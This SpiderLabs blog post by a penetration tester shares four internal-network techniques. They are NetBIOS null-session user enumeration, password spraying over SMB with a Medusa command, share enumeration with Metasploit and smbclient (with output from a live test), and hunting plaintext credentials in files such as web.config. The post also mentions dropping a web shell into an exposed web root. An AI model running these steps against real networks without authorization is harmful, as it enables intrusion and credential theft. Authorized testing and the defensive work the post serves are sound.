SpiderLabs Blog

PenTesting: From Low Risk Issues to Sensitive Data Compromising

Written by Bruno Oliveira | Sep 7, 2012 12:57:00 PM

Yes, I imagine you are probably tired to see blog posts about "real-world" PenTesting, people talking about how to execute the perfect PenTest or what's the best tactical solution, well I am sick of that too. What I can say is that I have already seen dozens of this type of texts published around the world and I wanted to try something different, but different how?

Well, I am going to enumerate the top 4 techniques I use when I get in an environment without the common vulnerabilities that are usually discussed in other articles.

By no means this should be used as a guide or something along those lines, these are just some hints from a pentester (and hundreds of tests executed) that could be helpful to prevent attacks and also to execute a test successfully. These tips should work in more than 80% of the tests, and that is why I chose to list them.

I am not giving details about the vulnerabilities, because I don't think it is necessary! When you read these tips, you can assume they are in some specific order, however it is not necessary to be used in the order I describe maybe in your approach you may skip some of the steps or you can just utilize these techniques at any given time of the test.

No cutting-edge techniques will be posted here, as I mentioned, these are just a few tips/hints from my experience on offensive tasks.

1 - NetBIOS Null Session

Normally, when I got nothing on the network, just a few non-exploitable services, no sensitive traffic, etc. I utilize the NetBIOS Null Session vulnerability mainly found on the DNS servers to enumerate users from the domain, there is a little script that does is awesome for accomplishing this called enum4linux.pl (http://labs.portcullis.co.uk/application/enum4linux/) amongst others available that can also be used for that matter.

2 - Easy Passwords

Ever since I joined SpiderLabs, I have been noticing that that users can be very lazy and that mostof passwords used out there are easy! After enumerating the usernames, you might want to try username as password and also Password123 and/orCompanyName123, you will probably retrieve some credentials. I usually use Medusa (http://www.foofus.net/~jmk/medusa/medusa.html) for brute-forcing, it's very simple and fast:

# medusa -hhost.you.retrieved.users -U userlist.txt -p Password123 -e s -O result -M smbnt

3 - Enumerate shared folders

If you happen to have any domain credentials that are not administrative accounts, the best thing todo is to enumerate the shared folders that you have access, there are several scripts that can make your life easier on this job, including a Metasploit (http://www.metasploit.com/)module:

msf > useauxiliary/scanner/smb/smb_enumshares

msfauxiliary(smb_enumshares) > set RHOSTS [TARGET HOST RANGE]

msfauxiliary(smb_enumshares) > run

It is not that uncommonto see shared folders that contain an entire drive (not administrative$ ones),and others not restricted containing sensitive information. It is very usefuleven when you don't have any credentials, anonymous shared folders sometimescan save our day!

While I was writingthis blog post, I was also executing an internal test where I found nothing,and I tried enumerating the shared folders with no credentials, you would besurprised how many shared folders I just had access, including entire drives,etc.

[*]172.16.1.172:139 My Book (H) - (DISK),E$ - Default share (DISK), IPC$ - Remote IPC (IPC), F Archive - (DISK), TV Archive1 - (DISK), TELESERVER1 - (DISK), G$ - Default share (DISK), TV Archive- (DISK), F$ - Default share (DISK),ADMIN$ - Remote Admin (DISK), H$ - Default share (DISK), ArchiverE - (DISK), C$ - Default share (DISK), Archiver- (DISK)

 

root@pentest:~#smbclient //172.16.1.172/Archiver

Enter root'spassword:

Domain=[XXXXXX]OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

smb: \> dir

$AVG DH 0 Thu Nov 4 09:00:45 2010

3com D 0 Tue Jul 17 12:08:47 2007

AUTOEXEC.BAT A 0 Wed Aug 11 18:15:00 2004

boot.ini AHSR 211 Tue Apr 3 12:54:48 2007

cda535ae48d15f7dca29bab5947e D 0 Sat Dec 16 05:29:13 2006

CONFIG.SYS A 0 Wed Aug 11 18:15:00 2004

dell D 0 ThuDec 14 09:23:23 2006

dell.sdr AHR 6177 Sat Nov 25 14:20:52 2006

Documents and Settings D 0 Thu Nov 4 08:58:19 2010

drivers D 0 Mon Aug 14 07:29:44 2006

FileSearch D 0 Fri Jan 18 09:41:16 2008

folder2 D 0 Fri Aug 24 14:38:50 2007

folder3 D 0 Mon Aug 27 11:34:19 2007

hiberfil.sys AHS 1005035520 Wed Aug 29 18:28:05 2012

i386 D 0 Tue Aug 21 15:02:41 2012

Inetpub D 0 Thu Jan 15 14:24:16 2009

INFCACHE.1 A 4128 Wed Jan 3 07:37:55 2007

IO.SYS AH 0 Wed Aug 11 18:15:00 2004

IPH.PH AH 832 Sat Nov 25 14:41:14 2006

iSeries Access Install Image D 0 Fri Apr 18 11:39:55 2008

MSDOS.SYS AH 0 Wed Aug 11 18:15:00 2004

My Documents D 0 Tue Oct 2 08:41:35 2007

NTDETECT.COM AHSR 47564 Wed Aug 4 06:00:00 2004

ntldr AHSR 250048 Fri Mar 11 08:45:00 2011

pagefile.sys AHS 1509949440 Wed Aug 29 18:28:05 2012

Program Files DR 0 Wed Sep 21 12:38:18 2011

RECYCLER DHS 0 Thu Mar 27 15:02:16 2008

Screen Savers D 0 Thu Jan 27 11:39:22 2011

Most of the times that you are able to list shared folders anonymously, you will be able to open the folders.

In this case, the environment had a XAMP running and the web root folder was on the drive H: that was shared as "My Book (H)". So, I was able to copy a web shell and compromise the system.

4 - Looking for important/helpful information on plain-text files

Based on my experience I know that all kinds of important information are saved by the users, not just passwords, but for example an Oracle SID can be very helpful since Oracle has multiple default credentials!This job is essentially manual, so you basically have to look for the information. I normally pick files named "New Text File.txt" or any" New*.*", Passwords*.*, and of course, the configuration files, web.config (connection string line ==sometimes password in plain-text), tnsnames.ora file, etc

Example:

<connectionStrings>

<add name="CPT_ConnectionString"

connectionString="Data Source=192.168.1.40\ccsql1;UserID=user;Password=pwd"

providerName="System.Data.SqlClient" />

</connectionStrings>

In the end, as I repeatedly said, nothing really new has been described above, however I bet that you, PenTester, might have forgot to take a deeper look at these simple techniques! I hope you enjoyed!